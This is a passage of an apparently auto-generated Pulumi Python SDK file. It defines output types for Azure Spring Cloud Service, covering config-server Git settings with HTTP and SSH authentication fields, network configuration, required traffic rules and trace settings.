if http_basic_auth is not None:
pulumi.set(__self__, "http_basic_auth", http_basic_auth)
if label is not None:
pulumi.set(__self__, "label", label)
if repositories is not None:
pulumi.set(__self__, "repositories", repositories)
if search_paths is not None:
pulumi.set(__self__, "search_paths", search_paths)
if ssh_auth is not None:
pulumi.set(__self__, "ssh_auth", ssh_auth)
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the default Git repository used as the Config Server back end, should be started with `http://`, `https://`, `git@`, or `ssh://`.
"""
return pulumi.get(self, "uri")
@property
@pulumi.getter(name="httpBasicAuth")
def http_basic_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingHttpBasicAuth']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auth")
@property
@pulumi.getter
def label(self) -> Optional[str]:
"""
The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def repositories(self) -> Optional[Sequence['outputs.SpringCloudServiceConfigServerGitSettingRepository']]:
"""
One or more `repository` blocks as defined below.
"""
return pulumi.get(self, "repositories")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Optional[Sequence[str]]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuth")
def ssh_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingSshAuth']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auth")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingHttpBasicAuth(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
:param str username: The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepository(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "httpBasicAuth":
suggest = "http_basic_auth"
elif key == "searchPaths":
suggest = "search_paths"
elif key == "sshAuth":
suggest = "ssh_auth"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingRepository. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceConfigServerGitSettingRepository.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceConfigServerGitSettingRepository.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
uri: str,
http_basic_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth'] = None,
label: Optional[str] = None,
patterns: Optional[Sequence[str]] = None,
search_paths: Optional[Sequence[str]] = None,
ssh_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositorySshAuth'] = None):
"""
:param str name: A name to identify on the Git repository, required only if repos exists.
:param str uri: The URI of the Git repository that's used as the Config Server back end should be started with `http://`, `https://`, `git@`, or `ssh://`.
:param 'SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthArgs' http_basic_auth: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
:param Sequence[str] patterns: An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param 'SpringCloudServiceConfigServerGitSettingRepositorySshAuthArgs' ssh_auth: A `ssh_auth` block as defined below.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "uri", uri)
if http_basic_auth is not None:
pulumi.set(__self__, "http_basic_auth", http_basic_auth)
if label is not None:
pulumi.set(__self__, "label", label)
if patterns is not None:
pulumi.set(__self__, "patterns", patterns)
if search_paths is not None:
pulumi.set(__self__, "search_paths", search_paths)
if ssh_auth is not None:
pulumi.set(__self__, "ssh_auth", ssh_auth)
@property
@pulumi.getter
def name(self) -> str:
"""
A name to identify on the Git repository, required only if repos exists.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the Git repository that's used as the Config Server back end should be started with `http://`, `https://`, `git@`, or `ssh://`.
"""
return pulumi.get(self, "uri")
@property
@pulumi.getter(name="httpBasicAuth")
def http_basic_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auth")
@property
@pulumi.getter
def label(self) -> Optional[str]:
"""
The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def patterns(self) -> Optional[Sequence[str]]:
"""
An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
"""
return pulumi.get(self, "patterns")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Optional[Sequence[str]]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuth")
def ssh_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositorySshAuth']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auth")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
:param str username: The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepositorySshAuth(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "privateKey":
suggest = "private_key"
elif key == "hostKey":
suggest = "host_key"
elif key == "hostKeyAlgorithm":
suggest = "host_key_algorithm"
elif key == "strictHostKeyCheckingEnabled":
suggest = "strict_host_key_checking_enabled"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingRepositorySshAuth. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceConfigServerGitSettingRepositorySshAuth.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceConfigServerGitSettingRepositorySshAuth.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
private_key: str,
host_key: Optional[str] = None,
host_key_algorithm: Optional[str] = None,
strict_host_key_checking_enabled: Optional[bool] = None):
"""
:param str private_key: The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
:param str host_key: The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
:param str host_key_algorithm: The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "private_key", private_key)
if host_key is not None:
pulumi.set(__self__, "host_key", host_key)
if host_key_algorithm is not None:
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
if strict_host_key_checking_enabled is not None:
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> Optional[str]:
"""
The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> Optional[str]:
"""
The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> Optional[bool]:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingSshAuth(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "privateKey":
suggest = "private_key"
elif key == "hostKey":
suggest = "host_key"
elif key == "hostKeyAlgorithm":
suggest = "host_key_algorithm"
elif key == "strictHostKeyCheckingEnabled":
suggest = "strict_host_key_checking_enabled"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingSshAuth. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceConfigServerGitSettingSshAuth.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceConfigServerGitSettingSshAuth.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
private_key: str,
host_key: Optional[str] = None,
host_key_algorithm: Optional[str] = None,
strict_host_key_checking_enabled: Optional[bool] = None):
"""
:param str private_key: The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
:param str host_key: The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
:param str host_key_algorithm: The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "private_key", private_key)
if host_key is not None:
pulumi.set(__self__, "host_key", host_key)
if host_key_algorithm is not None:
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
if strict_host_key_checking_enabled is not None:
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> Optional[str]:
"""
The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> Optional[str]:
"""
The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> Optional[bool]:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class SpringCloudServiceNetwork(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "appSubnetId":
suggest = "app_subnet_id"
elif key == "cidrRanges":
suggest = "cidr_ranges"
elif key == "serviceRuntimeSubnetId":
suggest = "service_runtime_subnet_id"
elif key == "appNetworkResourceGroup":
suggest = "app_network_resource_group"
elif key == "serviceRuntimeNetworkResourceGroup":
suggest = "service_runtime_network_resource_group"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceNetwork. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceNetwork.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceNetwork.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
app_subnet_id: str,
cidr_ranges: Sequence[str],
service_runtime_subnet_id: str,
app_network_resource_group: Optional[str] = None,
service_runtime_network_resource_group: Optional[str] = None):
"""
:param str app_subnet_id: Specifies the ID of the Subnet which should host the Spring Boot Applications deployed in this Spring Cloud Service. Changing this forces a new resource to be created.
:param Sequence[str] cidr_ranges: A list of (at least 3) CIDR ranges (at least /16) which are used to host the Spring Cloud infrastructure, which must not overlap with any existing CIDR ranges in the Subnet. Changing this forces a new resource to be created.
:param str service_runtime_subnet_id: Specifies the ID of the Subnet where the Service Runtime components of the Spring Cloud Service will exist. Changing this forces a new resource to be created.
:param str app_network_resource_group: Specifies the Name of the resource group containing network resources of Azure Spring Cloud Apps. Changing this forces a new resource to be created.
:param str service_runtime_network_resource_group: Specifies the Name of the resource group containing network resources of Azure Spring Cloud Service Runtime. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "app_subnet_id", app_subnet_id)
pulumi.set(__self__, "cidr_ranges", cidr_ranges)
pulumi.set(__self__, "service_runtime_subnet_id", service_runtime_subnet_id)
if app_network_resource_group is not None:
pulumi.set(__self__, "app_network_resource_group", app_network_resource_group)
if service_runtime_network_resource_group is not None:
pulumi.set(__self__, "service_runtime_network_resource_group", service_runtime_network_resource_group)
@property
@pulumi.getter(name="appSubnetId")
def app_subnet_id(self) -> str:
"""
Specifies the ID of the Subnet which should host the Spring Boot Applications deployed in this Spring Cloud Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "app_subnet_id")
@property
@pulumi.getter(name="cidrRanges")
def cidr_ranges(self) -> Sequence[str]:
"""
A list of (at least 3) CIDR ranges (at least /16) which are used to host the Spring Cloud infrastructure, which must not overlap with any existing CIDR ranges in the Subnet. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cidr_ranges")
@property
@pulumi.getter(name="serviceRuntimeSubnetId")
def service_runtime_subnet_id(self) -> str:
"""
Specifies the ID of the Subnet where the Service Runtime components of the Spring Cloud Service will exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "service_runtime_subnet_id")
@property
@pulumi.getter(name="appNetworkResourceGroup")
def app_network_resource_group(self) -> Optional[str]:
"""
Specifies the Name of the resource group containing network resources of Azure Spring Cloud Apps. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "app_network_resource_group")
@property
@pulumi.getter(name="serviceRuntimeNetworkResourceGroup")
def service_runtime_network_resource_group(self) -> Optional[str]:
"""
Specifies the Name of the resource group containing network resources of Azure Spring Cloud Service Runtime. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "service_runtime_network_resource_group")
@pulumi.output_type
class SpringCloudServiceRequiredNetworkTrafficRule(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "ipAddresses":
suggest = "ip_addresses"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceRequiredNetworkTrafficRule. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceRequiredNetworkTrafficRule.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceRequiredNetworkTrafficRule.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
direction: Optional[str] = None,
fqdns: Optional[Sequence[str]] = None,
ip_addresses: Optional[Sequence[str]] = None,
port: Optional[int] = None,
protocol: Optional[str] = None):
"""
:param str direction: The direction of required traffic. Possible values are `Inbound`, `Outbound`.
:param Sequence[str] fqdns: The FQDN list of required traffic.
:param int port: The port of required traffic.
:param str protocol: The protocol of required traffic.
"""
if direction is not None:
pulumi.set(__self__, "direction", direction)
if fqdns is not None:
pulumi.set(__self__, "fqdns", fqdns)
if ip_addresses is not None:
pulumi.set(__self__, "ip_addresses", ip_addresses)
if port is not None:
pulumi.set(__self__, "port", port)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
@property
@pulumi.getter
def direction(self) -> Optional[str]:
"""
The direction of required traffic. Possible values are `Inbound`, `Outbound`.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def fqdns(self) -> Optional[Sequence[str]]:
"""
The FQDN list of required traffic.
"""
return pulumi.get(self, "fqdns")
@property
@pulumi.getter(name="ipAddresses")
def ip_addresses(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "ip_addresses")
@property
@pulumi.getter
def port(self) -> Optional[int]:
"""
The port of required traffic.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> Optional[str]:
"""
The protocol of required traffic.
"""
return pulumi.get(self, "protocol")
@pulumi.output_type
class SpringCloudServiceTrace(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "instrumentationKey":
suggest = "instrumentation_key"
elif key == "sampleRate":
suggest = "sample_rate"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceTrace. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceTrace.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceTrace.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
instrumentation_key: str,
sample_rate: Optional[float] = None):
"""
:param str instrumentation_key: The Instrumentation Key used for Application Insights.
:param float sample_rate: The sampling rate of Application Insights Agent. Must be between `0.0` and `100.0`. Defaults to `10.0`.
"""
pulumi.set(__self__, "instrumentation_key", instrumentation_key)
if sample_rate is not None:
pulumi.set(__self__, "sample_rate", sample_rate)
@property
@pulumi.getter(name="instrumentationKey")
def instrumentation_key(self) -> str:
"""
The Instrumentation Key used for Application Insights.
"""
return pulumi.get(self, "instrumentation_key")
@property
@pulumi.getter(name="sampleRate")
def sample_rate(self) -> Optional[float]:
"""
The sampling rate of Application Insights Agent. Must be between `0.0` and `100.0`. Defaults to `10.0`.
"""
return pulumi.get(self, "sample_rate")
@pulumi.output_type
class GetSpringCloudAppIdentityResult(dict):
def __init__(__self__, *,
principal_id: str,
tenant_id: str,
type: str):
"""
:param str principal_id: The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
:param str tenant_id: The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
:param str type: The Type of Managed Identity assigned to the Spring Cloud Application.
"""
pulumi.set(__self__, "principal_id", principal_id)
pulumi.set(__self__, "tenant_id", tenant_id)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> str:
"""
The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
"""
return pulumi.get(self, "principal_id")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> str:
"""
The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> str:
"""
The Type of Managed Identity assigned to the Spring Cloud Application.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class GetSpringCloudAppPersistentDiskResult(dict):
def __init__(__self__, *,
mount_path: str,
size_in_gb: int):
"""
:param str mount_path: The mount path of the persistent disk.
:param int size_in_gb: The size of the persistent disk in GB.
"""
pulumi.set(__self__, "mount_path", mount_path)
pulumi.set(__self__, "size_in_gb", size_in_gb)
@property
@pulumi.getter(name="mountPath")
def mount_path(self) -> str:
"""
The mount path of the persistent disk.
"""
return pulumi.get(self, "mount_path")
@property
@pulumi.getter(name="sizeInGb")
def size_in_gb(self) -> int:
"""
The size of the persistent disk in GB.
"""
return pulumi.get(self, "size_in_gb")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingResult(dict):
def __init__(__self__, *,
http_basic_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult'],
label: str,
repositories: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryResult'],
search_paths: Sequence[str],
ssh_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingSshAuthResult'],
uri: str):
"""
:param Sequence['GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthArgs'] http_basic_auths: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
:param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositoryArgs'] repositories: One or more `repository` blocks as defined below.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param Sequence['GetSpringCloudServiceConfigServerGitSettingSshAuthArgs'] ssh_auths: A `ssh_auth` block as defined below.
:param str uri: The URI of the Git repository
"""
pulumi.set(__self__, "http_basic_auths", http_basic_auths)
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "repositories", repositories)
pulumi.set(__self__, "search_paths", search_paths)
pulumi.set(__self__, "ssh_auths", ssh_auths)
pulumi.set(__self__, "uri", uri)
@property
@pulumi.getter(name="httpBasicAuths")
def http_basic_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auths")
@property
@pulumi.getter
def label(self) -> str:
"""
The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def repositories(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryResult']:
"""
One or more `repository` blocks as defined below.
"""
return pulumi.get(self, "repositories")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Sequence[str]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuths")
def ssh_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingSshAuthResult']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auths")
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the Git repository
"""
return pulumi.get(self, "uri")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Http Basic Authentication Git repository server.
:param str username: The username used to access the Http Basic Authentication Git repository server.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositoryResult(dict):
def __init__(__self__, *,
http_basic_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult'],
label: str,
name: str,
patterns: Sequence[str],
search_paths: Sequence[str],
ssh_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult'],
uri: str):
"""
:param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthArgs'] http_basic_auths: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
:param str name: Specifies The name of the Spring Cloud Service resource.
:param Sequence[str] patterns: An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthArgs'] ssh_auths: A `ssh_auth` block as defined below.
:param str uri: The URI of the Git repository
"""
pulumi.set(__self__, "http_basic_auths", http_basic_auths)
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "patterns", patterns)
pulumi.set(__self__, "search_paths", search_paths)
pulumi.set(__self__, "ssh_auths", ssh_auths)
pulumi.set(__self__, "uri", uri)
@property
@pulumi.getter(name="httpBasicAuths")
def http_basic_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auths")
@property
@pulumi.getter
def label(self) -> str:
"""
The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def name(self) -> str:
"""
Specifies The name of the Spring Cloud Service resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def patterns(self) -> Sequence[str]:
"""
An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
"""
return pulumi.get(self, "patterns")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Sequence[str]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuths")
def ssh_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auths")
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the Git repository
"""
return pulumi.get(self, "uri")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Http Basic Authentication Git repository server.
:param str username: The username used to access the Http Basic Authentication Git repository server.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult(dict):
def __init__(__self__, *,
host_key: str,
host_key_algorithm: str,
private_key: str,
strict_host_key_checking_enabled: bool):
"""
:param str host_key: The host key of the Git repository server.
:param str host_key_algorithm: The host key algorithm.
:param str private_key: The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "host_key", host_key)
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
pulumi.set(__self__, "private_key", private_key)
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> str:
"""
The host key of the Git repository server.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> str:
"""
The host key algorithm.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> bool:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingSshAuthResult(dict):
def __init__(__self__, *,
host_key: str,
host_key_algorithm: str,
private_key: str,
strict_host_key_checking_enabled: bool):
"""
:param str host_key: The host key of the Git repository server.
:param str host_key_algorithm: The host key algorithm.
:param str private_key: The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "host_key", host_key)
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
pulumi.set(__self__, "private_key", private_key)
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> str:
"""
The host key of the Git repository server.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> str:
"""
The host key algorithm.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, needed when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> bool:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class GetSpringCloudServiceRequiredNetworkTrafficRuleResult(dict):
def __init__(__self__, *,
direction: str,
fqdns: Sequence[str],
ip_addresses: Sequence[str],
port: int,
protocol: str):
"""
:param str direction: The direction of required traffic. Possible values are `Inbound`, `Outbound`.
:param Sequence[str] fqdns: The FQDN list of required traffic.
:param int port: The port of required traffic.
:param str protocol: The protocol of required traffic.
"""
pulumi.set(__self__, "direction", direction)
pulumi.set(__self__, "fqdns", fqdns)
pulumi.set(__self__, "ip_addresses", ip_addresses)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "protocol", protocol)
@property
@pulumi.getter
def direction(self) -> str:
"""
The direction of required traffic. Possible values are `Inbound`, `Outbound`.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def fqdns(self) -> Sequence[str]:
"""
The FQDN list of required traffic.
"""
return pulumi.get(self, "fqdns")
@property
@pulumi.getter(name="ipAddresses")
def ip_addresses(self) -> Sequence[str]:
return pulumi.get(self, "ip_addresses")
@property
@pulumi.getter
def port(self) -> int:
"""
The port of required traffic.
"""
